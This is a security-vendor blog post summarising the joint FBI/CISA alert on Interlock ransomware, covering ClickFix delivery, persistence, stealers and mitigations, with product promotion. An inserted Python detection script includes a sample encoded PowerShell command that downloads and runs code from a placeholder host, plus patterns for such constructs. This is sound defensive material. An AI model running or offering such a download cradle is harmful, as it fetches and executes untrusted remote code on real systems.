Interlock Ransomware Detection: The FBI, CISA, and Partners Issue Joint Alert on Massive Attacks via the ClickFix Social Engineering Technique

In mid-July 2025, researchers reported the reemergence of the Interlock ransomware group, this time leveraging a modified version of the ClickFix social engineering technique to deliver a novel PHP-based iteration of its custom RAT. In response to the growing threat, the authoring agencies, including the FBI and CISA, have issued a joint cybersecurity alert notifying the global cyber defender community of escalating Interlock ransomware activity. Adversaries have been observed gaining initial access via uncommon drive-by downloads from compromised legitimate sites and the ClickFix social engineering tactic, then applying a double extortion model: exfiltrating and encrypting data to pressure victims into paying the ransom.

Detect Interlock Ransomware Activity

According to IBM, breaches take over 250 days to detect and cost organizations an average of $4.99 million to recover from. At the same time, ransomware operations continue to evolve, becoming more sophisticated and targeting organizations of all sizes, from large enterprises to small businesses. The latest aa25-203a alert by CISA and partners on Interlock ransomware highlights this growing threat, revealing that the group behind it has already targeted multiple victims across various industry verticals.

Register for the SOC Prime Platform to detect potential attacks against your organization at the earliest stages with a dedicated rule collection addressing TTPs associated with Interlock ransomware activity. Hit the Explore Detections button below to access the rule collection, enriched with actionable CTI and backed by a complete product suite for advanced threat detection and hunting.

Explore Detections

All the rules are compatible with multiple SIEM, EDR, and Data Lake solutions and mapped to the MITRE ATT&CK framework. Additionally, every rule is packed with detailed metadata, including threat intel references, attack timelines, triage recommendations, and more.

Optionally, cyber defenders can apply “Interlock Ransomware” and “aa25-203a” tags to filter out content in the Threat Detection Marketplace according to their preferences. Alternatively, they can use the broader “Ransomware” tag to access a wider range of detection rules covering ransomware attacks globally.

Also, security experts can streamline threat investigation using Uncoder AI, a private IDE and co-pilot for detection engineering. Generate detection algorithms from raw threat reports, enable fast IOC sweeps, predict ATT&CK tags, optimize query code with AI tips, and translate it across multiple SIEM, EDR, and Data Lake languages. For instance, cyber defenders can use the aa25-203a alert to generate an Attack Flow in a single click.

Use Uncoder AI to visualize the Attack Flow related to the latest Interlock ransomware campaign covered in the aa25-203a alert

Interlock Ransomware Attack Analysis Covered in the aa25-203a Alert

The Interlock ransomware group is a relatively recent entrant in the cyber threat landscape, but it has quickly advanced in sophistication and impact. Since September 2024, Interlock ransomware operators have targeted a broad spectrum of businesses and critical infrastructure across North America and Europe. These financially motivated, opportunistic actors aim to infiltrate systems and disrupt essential services. Their attacks follow a double extortion model, encrypting and exfiltrating data, while providing victims with a unique code and directing them to contact the group via a .onion address on the Tor network, without stating an upfront ransom demand or payment details. In light of the escalating threat, the FBI, CISA, and partnering agencies have released a joint alert aimed at raising cybersecurity awareness and helping global organizations proactively defend against Interlock ransomware attacks.

So far, Interlock actors have primarily encrypted virtual machines, sparing hosts, workstations, and physical servers, although this may change in future campaigns. Additionally, the authoring agencies have noted open-source intelligence indicating potential overlaps between Interlock and Rhysida ransomware variants.

Researchers observed Interlock ransomware actors using uncommon initial access techniques, including drive-by downloads from compromised legitimate websites and social engineering tactics like the ClickFix technique, which tricks users into running a malicious Base64-encoded PowerShell command via a fake CAPTCHA. Previously, payloads were disguised as browser updates; more recently, they mimic security software updates. Notably, the ClickFix technique has also been used in several other offensive campaigns, including Lumma Stealer and DarkGate. Once executed, the PowerShell script installs the custom RAT and drops it into the Startup folder so that it persists across reboots. In some cases, persistence is instead established by adding a Windows Registry run key named “Chrome Updater.”
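The three host-level behaviours described above (an encoded PowerShell command, a drop into the Startup folder, a Run key named “Chrome Updater”) can be surfaced from endpoint telemetry. The following triage routine is an added example, not code from the SOC Prime post or the aa25-203a alert; it assumes constructed Sysmon-style `key=value` event lines, and the SID, user name and URL in the samples are placeholders.

```python
import base64
import re

# Added example (not from the SOC Prime post or the aa25-203a alert): flags the ClickFix
# behaviours the text names in constructed Sysmon-style event lines: a Base64-encoded
# PowerShell command, a drop into the Startup folder, a Run key named "Chrome Updater".
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")
CRADLE = re.compile(r"(?i)\biex\b|invoke-expression|downloadstring|net\.webclient|"
                    r"invoke-webrequest|frombase64string")  # download/execute constructs
RUN_KEY = re.compile(r"(?i)\\CurrentVersion\\Run\\Chrome Updater$")
STARTUP = re.compile(r"(?i)\\Start Menu\\Programs\\Startup\\")

def encode_command(script):
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, Base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (or one of its prefixes), else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    b64 = m.group(1)
    try:  # tolerate stripped padding; reject anything that is not UTF-16LE text
        return base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(line):
    """Return the findings for one 'key=value key="quoted"' event line ([] means clean)."""
    ev = {k: v.strip('"') for k, v in re.findall(r'(\w+)=("[^"]*"|\S+)', line)}
    findings = []
    if ev.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        script = decode_encoded_command(ev.get("CommandLine", ""))
        if script is not None:
            hits = sorted({h.lower() for h in CRADLE.findall(script)})
            findings.append("encoded PowerShell with download/execute constructs: " + ", ".join(hits)
                            if hits else "encoded PowerShell command (review decoded content)")
    if RUN_KEY.search(ev.get("TargetObject", "")):
        findings.append("Run key persistence named 'Chrome Updater'")
    if STARTUP.search(ev.get("TargetFilename", "")):
        findings.append("file dropped into the Startup folder")
    return findings

PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [  # constructed; the SID, user name and URL are placeholders
    f'EventID=1 Image={PS} CommandLine="powershell -w hidden -enc '
    + encode_command("iex (New-Object Net.WebClient).DownloadString('http://captcha.example.invalid/v')") + '"',
    f'EventID=13 Image={PS} TargetObject="HKU\\S-1-5-21-0-0-0-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Chrome Updater"',
    f'EventID=11 Image={PS} TargetFilename="C:\\Users\\u\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\upd.lnk"',
    f'EventID=1 Image={PS} CommandLine="powershell -enc {encode_command("Get-Date")}"',  # benign encoded
    'EventID=1 Image=C:\\Windows\\System32\\notepad.exe CommandLine="notepad.exe notes.txt"',
]
```

Running `triage()` over `SAMPLE_EVENTS` flags the first four lines and returns an empty list for the notepad event; the benign encoded command is still reported for review, since decoding alone cannot tell a legitimate admin script from a ClickFix payload.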

Further, adversaries use PowerShell scripts to gather system information, followed by the deployment of C2 tools such as Cobalt Strike, SystemBC, Interlock RAT, and NodeSnake RAT. Once inside, they execute PowerShell commands to install a credential stealer (cht.exe) and a keylogger (klg.dll) that capture credentials and keystrokes. They also use Lumma and Berserk Stealers to escalate privileges. For cloud exfiltration, they abuse Azure Storage Explorer and AzCopy, as well as WinSCP for broader data theft. Lateral movement is achieved through RDP, AnyDesk, and PuTTY, and in some cases Kerberoasting is used to obtain domain admin rights.

As Interlock ransomware mitigation measures, the agencies recommend a multi-layered defense strategy, including preventing initial access by deploying DNS filtering and web access firewalls, enforcing NIST-compliant password policies, enabling MFA across all critical services, and implementing ICAM. Further defense enhancements involve regularly updating all software and firmware, prioritizing the patching of CVEs, and segmenting networks to limit lateral movement. By relying on SOC Prime’s complete product suite for enterprise-ready security protection backed by AI, automated capabilities, real-time threat intel, and built on zero-trust security milestones, organizations across multiple industry sectors can adopt a scalable, future-proof cybersecurity strategy.

The post Interlock Ransomware Detection: The FBI, CISA, and Partners Issue Joint Alert on Massive Attacks via the ClickFix Social Engineering Technique appeared first on SOC Prime.